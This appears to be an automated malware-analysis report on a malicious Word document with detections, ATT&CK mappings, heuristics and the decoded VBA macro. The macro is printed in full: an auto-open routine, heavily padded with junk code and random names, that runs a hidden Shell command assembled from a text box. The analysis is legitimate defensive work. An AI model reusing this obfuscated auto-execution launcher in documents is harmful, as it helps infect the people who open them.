MALICIOUS
292
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059.001 PowerShell
T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The 'autoopen' macro is present and triggers a 'Shell()' call, indicating an attempt to execute arbitrary code. Heuristics also indicate suspicious invocations of 'cmd.exe' and references to 'PowerShell', suggesting the macro is designed to download and execute a second-stage payload. The specific family is not identifiable from the provided evidence.
Heuristics 10
-
ClamAV: Doc.Malware.Sonbokli-6786376-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Sonbokli-6786376-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBAMatched line in script
Set YVFEamZMCBGLCSWZUJGinKQ = HoiBMNIsUwCEPXisCQfWNP otqOFNXMz = Array(brIFIS, EcHmcHS, ulsSYwIiX, Interaction.Shell(FJiHDJoBvaI, DwNpiWpA), EUddPca) Select Case zkbUQkjGbBDiVRYfMOI -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox" Sub autoopen() GiIvHcf -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.iec.ch In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9931 bytes |
SHA-256: a15e8c34622087857b9938c39724f15199ccadab7275178c6b9f6a986519dfd0 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
265 of 308 identifiers look randomly generated (e.g. 'IDERijbrjplIvitQQCLbjqwH') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "AiliVFBnpQBWf"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
GiIvHcf
End Sub
Attribute VB_Name = "jCrccuGihAQA"
Function GiIvHcf()
On Error Resume Next
Select Case uiBizvUWjWiYSNqvNtF
Case 211762241
ZvlSHSObvElzChPUMvBiqXlm = fTOcpoozZUnPPpcFunRtZQfa
AzDBHBJzVczAzFQzBdM = Log(EwFYYvkTsYPnnAoqkwR)
dQtNdFuhBwXmTzWEsi = 189480325
RpGzNLMwRZMFLtzo = svTBCSwAcUoikz
Case 39275106
FBoJwzSswQbkRbZBiB = 341471985
JKPXKwlqYUhcGmFrJiGsc = Log(EmqMiAvnwjwWJvmRzzO)
UbjzdfVhrDuHGiFdjwN = 238092348
kYzikcKFsiGiBFdCqiDiNvso = Log(PbpIkBlijjDlVtCLbzYncFc)
End Select
Set apPKFipjInUBVzHdVzUW = RVpATlvTBOJwMiumbZz
Select Case tRMziBszBzUfDqRSVZtRtJ
Case 327569417
oljBGZGbAUuUQmKj = YYQYRYoNGptiUzkT
JtSqsbqtfiwwBiPJEUkhnWMu = Log(zkNsfXKBQdQRWjwZimpsQE)
iYPczmLnjXCsrdA = 338269233
lvkFwsionHJjWBXv = jUQuKPEqjtTnEwiniGVU
Case 6686848
fhoLiCDKVfzNujjQbjfO = 94362220
OBiKivrvBacCpjGwkBmZXopr = Log(wEOfpomRfSndUY)
SaiWkrqzJcvdcoc = 174944361
rIjrdQMmqlJQSVQd = Log(HwJSGKHEECtKKdCsclLr)
End Select
Set oKRktGjjrHfzzjjQs = zZnYNSbjHHYqjEmOSlsiM
Select Case IZZLRnBBKVJOwhQdEYCNfBU
Case 226235697
KJppoZolLApofcnW = rTcCAvqaTJhLMHErBGi
LVvVcnjapYwPrEJA = Log(HKNzOVPGawskwdV)
LOVXHZNOQkuNRTH = 326687805
ltwQLzAjOCoopt = aGjqodwiwwiiaBoGrvhLjYs
Case 337374978
UrsXZaarzmLnRJanL = 1678958
cSaiavztIhLBOhYTm = Log(KXYInaPdTZlGXYY)
WwuMScbhSJokwGspohA = 189700483
UfzPwbXHBKndnKaYZnivrqd = Log(ijNhwSpXvhBTvwVADaQzAH)
End Select
Set vSROuShCiCMlQOq = jUQhGJHccRirQZim
Select Case CYbWSLGdvrtmpNsolrw
Case 81896631
fkZmwIwvQSqdIui = TCZvKziFTLwUiCG
VWXoCjUCJhfYDIjTKjRo = Log(QuiCTSmMcNOMKIlWtFj)
XmcSJCKicJCkRHEbpmjRh = 280516889
URLsAuwQbiGBiSPsQHHj = KdvDDKhHWSBjFHBzK
Case 68298671
jtbBLGaJZtSJZHOKnQpwk = 96834096
FQEUYKOuGzXDZjb = Log(zdAIOEIbZrzOhVNzRkWlG)
BzLwLLCDobLjrTjGuBHdv = 220835322
ANljYlpNpdLcBzPs = Log(ZVCVCBduPLpVicqTmKlZciRz)
End Select
Set VCjqiJfIKEZfrzMIo = azsKAUIPmiTUvDC
Const DwNpiWpA = 0
Select Case lVwlVOfIYfPvML
Case 312551555
FCuRJrUZHOwzvmHj = ZzvQZPMtiHKMIHI
uwfivtuAXiHQiMlXjnnN = Log(tjniYbkJNzHqTBqcENfDvtuI)
LVVnjVTuiBPrwWSKqKfzZOKv = 305664991
ZHKEAlimMFOWjinvoAa = IqNtEjPIWwLatFvMjZAdN
Case 67441472
MvUdBMiaKUJTitRA = 111466308
WQPuodbibLOzzXzjAz = Log(FOwrWAGjmMSSZjHquuSHq)
SkSLLWlVCsTQLH = 170518531
tuhtpVItpPqhDliqtCw = Log(ZLojwRKZwJYzQWBY)
End Select
Set wNwcZWvjERQKdXILOwh = wvYLjufrqQhkKQw
Select Case rptbBCRRihSiai
Case 60944573
XnkDstXtTwXfwqddki = iznlLKQHoOjXnUirqAoKzS
IFflVoEozrqiXj = Log(YscmifkYjLRzmc)
XrMzfjfZuSkZlfzpHHobwiLk = 138290136
jvaDpRMBUzSXDWsThTz = wtmVKrwAzpfciHA
Case 238460256
qdSNjLzXjERjcArmPZnJEtzT = 76948995
iTqtwVIUqqfsPh = Log(wbnjRWoopPhNbuzfzBhjih)
IwaIJBGXKFUGRKmufqfAdO = 56865580
ZtKfqiBKQkfkrNfmjsXHG = Log(fVMHBqzhMtnsjQrajcEJpj)
End Select
Set CCSKsRlqAalNoTjhKLjY = zwiPvILvDwwwqKEifGPaD
Select Case vzNqVzoNGQNPHLvbXZbGjz
Case 113748171
ZFwdmZZPHYfUwpbtYh = IDERijbrjplIvitQQCLbjqwH
fbchzhizDJQUnOwKipZWQ = Log(lEYLqMFPREwjCEwJlICIs)
dwdoOQzAZlSvpYJmqVu = 263425614
MYDLsLZEQTIrMbchCwoRRiK = HOazzRhOEiRXZdVEY
Case 317662200
RJDdzhFoXFWZhNm = 25750100
lZEwmuniJEHZcktVVtHD = Log(dStdKIiIjKmZsTwrKiPQw)
cwOuVcDMUfArIGLVclFVau = 135286722
kQuiKOrnnppvPP = Log(FEXpHYAKrfpCiKdNidOKEi)
End Select
Set BFnMESRPFNzzQCENbjG = wVLNcKcHSBFjXf
Select Case ujKHAHpoLmDwRwOtmKKuYHiC
Case 52461296
unfuZBCfDvuMzaVr = ZqBwDuEFflLbnAHzoN
IQNCwmtTzZMkYj = Log(JMGOqsaotPrEPunNINUjEM)
FKKaFjSBmuBrutaWIibTmE = 226726014
ZMMEWEzhzYAEfSUIbNEJ = CsUirLAcsBAbhBtTO
Case 205701779
zUuVsVqqNTsYAYOXTsVis = 322251076
EXzcwQboMiWMtH = Log(bNBVmJzcACTdZbsApA)
pwtssZmifqiMUPzRI = 195846377
KuFuzaimBNUijMdSXh = Log(IvAiTmVqwOcJkWSqVk)
End Select
Set uSNmlQLHwArzZj = UbJQlHdjjYYEkLOWHhTnCv
Select Case YlDWTLoHGrjnlMoihiaR
Case 71876279
tBvtSiDHYAchwEwMDK = GpKRtzbXoTODsRCrBbZt
EwSiKEOjjViPnDh = Log(jBwrKOnKwkQwMwldRYCqr)
jtMnEwjnFNUJSZdCvpLIm = 173795293
SWnkAwOBqqARDiWKpaIiCb = iLAPdMijwJFuRR
Case 92173373
prMiSSHaXYfWidwlrTIYA = 228422692
oMHDIzjFsbrTmqzkMDZrE = Log(IATMTDwIpiGGXRLOwcnSm)
rKJutiwVaqjGDHkvijHjmIM = 216434472
fZzEzDluNJIDYJPMT = Log(PZQODdCwHLDIizc)
End Select
Set OIwQdnvMpzbsFWrXSAw = BQVUBwwarFbLbwu
FJiHDJoBvaI = AiliVFBnpQBWf.TextBox1 + iciEZ + KtlTf + SrFKGM + PVTdz + UUkWQQIb + BUawmiO + JGWwUjoA + GXLXZjN + iUbLi + jpjlu + cHJmiQ
Select Case GjuaofTcPWMGpQjUlpIpkd
Case 185276828
dYAidFWwcuAUNX = XtMCptkWviKLqj
EcEuzQfozJAQivPO = Log(NolwYbmHsBFATtf)
QqYPTaksFMtpcFbjP = 20969943
CvPfBSmEOZnfPVAOErwnnEsq = hwinZZlQvcUALWzj
Case 141964255
SSjiUcrXpQQLwCZTTV = 54732018
pABPTsfOtUBGRiaXi = Log(cBwCjVAkiSarCb)
EjRRRKczcdUPJtPbCoQ = 298824932
VmQjPiNNoBSZhNC = Log(FNtAETYPGqrPqXD)
End Select
Set iRitAlBbOkocCpcfMSwaWt = BOBaZrwWQwfrPi
Select Case soTDKucXliYCMWWFznsaril
Case 39353978
pVaFKmNwpFpzppuYzdWScOi = kTtAECODNLUYBSa
LEXQjFHzwCrAPnPbnSUrtMtm = Log(mmiVVXhCaHYqScfLvCCKOoZ)
tljzjCwKkZtTdccfKzofrkUq = 272859816
zKrbcwMibknjTYJNFsiL = SaWAQzuEIRsICEoTJzvGu
Case 6284503
radQWdfcIdzfjUbLwSiTTub = 111568322
UuwvmFnRifZniXadok = Log(FYEwhlwoQhZwzMwBiijV)
KNBpBYQuDqiJzLuQwOK = 273058841
WkJiaalWruIPGvKDI = Log(MjtNqumCBClmTWjHndsH)
End Select
Set wiYLvWuqQkMnizIWJtO = YZjkFbliwIhKBEOBVBuYrLkR
Select Case liQqczZjMqJlPNriiJuElFi
Case 48292880
fzoPaROVmcwHoSY = QpDjtwDJHGqBWHfAI
wCkTmZvPdkuatrVmVPaXP = Log(tiHTbMziwwwGVWhzDiodU)
PhMwfkmQZkSOJFLSzi = 107815517
nwbnVzEXMwjlMaPaGchOsjWN = GMbmkjGNWfRFZdfjODdBjC
Case 229833539
kMVBBFHbOwOmclcPcYqvwV = 218895407
BiictMIEdlBXKFLQYpraOsDd = Log(NYHLnsOiWzSbiiBqKJr)
EEXMaXIiGkIfABfnAtqtn = 296723620
FtotHpkEjMuWIAvlQjkYmr = Log(bcCOqQTwwLQSTldBpWfYTG)
End Select
Set XmEHZJCUBNGNQEaunQNz = ricAnhuCGSUUwfcl
Select Case jwzpVQCAzdJKkhXG
Case 46771868
rSBKwNzOJijKNLAQD = OiIFvMDaARdXjcPAw
JVwlpGGTTmPwJUdEsYImWpG = Log(NhlmwEvNPJGhUctCwct)
KBIJtfjrrJUUPZXIV = 135102298
OqCjzNwkPfGnuvoNMZ = sTUEVFolSuFkjiGiaHS
Case 60937234
zvULkWaYaMLjucCtmhdKcdpK = 305824814
JnROGtPjuYAskiOMrit = Log(lCEkoaowTUFKRK)
mHMFRTOhdttwvvPl = 48367220
soHijZfFQMaSqbaVb = Log(fcciXUaruitCEiz)
End Select
Set YVFEamZMCBGLCSWZUJGinKQ = HoiBMNIsUwCEPXisCQfWNP
otqOFNXMz = Array(brIFIS, EcHmcHS, ulsSYwIiX, Interaction.Shell(FJiHDJoBvaI, DwNpiWpA), EUddPca)
Select Case zkbUQkjGbBDiVRYfMOI
Case 213553833
MjWLVLlZwwPbYOoBAoZiIRa = jZDvqjUCOjnDFIuZzhdEoGwC
dLaizkvGXfvIqjObMNrbl = Log(rtAkaoVKadAMMYtUQwrzhdwQ)
wOcctFbwhThiNJG = 238962951
ESIiWqhswvjnOOuj = cathjXYNfEMlDmlMUYjI
Case 194425028
XvkzJsKSFnzkhjrjYuj = 110884928
mVGsJwaupOazBCzzjOjCMzY = Log(SEEVoAlZMklZiEAtkYPZYl)
itiojCOimwTaEtFGodAm = 111869160
YTfNmSojzNhYZcFME = Log(wFwcKdwAfSbwYwPNUP)
End Select
Set TPwqDzGsfTcAcYd = LSwIBQmnWIDpiJMHpDkHCP
Select Case FRjiwhfsuzlmbuYhGYj
Case 165473779
HYHBqDWYPlNWlQqlcdG = tBXfSoEiCwlwVAwtchFiIUf
YPqiiwivdiiFAbjCw = Log(VRzQBkRzJuYbhYWJHCwazG)
qTmVssAwDfVwOOHOFM = 243232673
jXBAFjrTjDYoPzJzOPZFIw = vMaHuAosNOTkSRmPIA
Case 215693894
zHjjREKzqnfimCFnf = 184445548
TsLLZvMqfczQEbfVofqqqppC = Log(iowQLwjjDMZowHoENiW)
XbDHjRIplHdDIlqHNaTiPjA = 96688268
hrYClcLSMCHlqkt = Log(uvwiWfKRhrnKranaoBwajn)
End Select
Set iSkwjjVXpZoVoEfjCjHUuoAa = PjwomTGGvRQlibiLTwlDF
Select Case vfUpGjtUcoEJdzDmfDrlL
Case 79390792
FbBKSVvztWpvjCqKauBO = ZiNcuosEnBZjzPOEYbwjqK
oDTkotRqKzsjzohYjDsFVP = Log(kmbFCTCivOrYZaED)
WKPlGjRPqDSdwFQZ = 282489848
zNnPXHPzRFQIzczhiKzad = KpLQkEzIaziqHq
Case 154770044
nIWJRMziFpdRXGZ = 106030876
uCwDGWKAJiQZGVI = Log(bXqETmwpcKuajlUZ)
kNoZDjlLJHhiIwUVH = 316186135
iLmHEIawbjTYJrHVIUkXq = Log(sKiQHULaFZpmqGw)
End Select
Set jRdkKcpjXrBdMBW = rdTbdnBGkBiuiXAAWDk
Select Case TwJSozjKPHBZhHhw
Case 324122818
XvUJjnaDwHBqTlUUlBsIYhfh = kfKpZFYcDEVrJPWs
zYJZoPFNWfGpXpPnzwIPN = Log(CcNPhzcblVPniHXnwPE)
CZRnjPFDMTOdWaVjLZi = 40075943
vtlZjHIPKzsKmWdLaiRtY = SHmQHlrbWhwqHfjOw
Case 53767800
nCTVSkEsVlqQMMjbdnSzXYid = 71002413
vPwiMlJwkNwlTjDt = Log(qfQmdaDCadJZPTqLGo)
tqYFGPcTdsTmviCrztZSou = 184323825
HAWVtIaNrPzfRaJWBHaKH = Log(NvMcsRjWAzOnzGtHZURFvff)
End Select
Set ZXjDRjTRiQmaIRPJjU = zRicDduiFsBvhQpCV
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.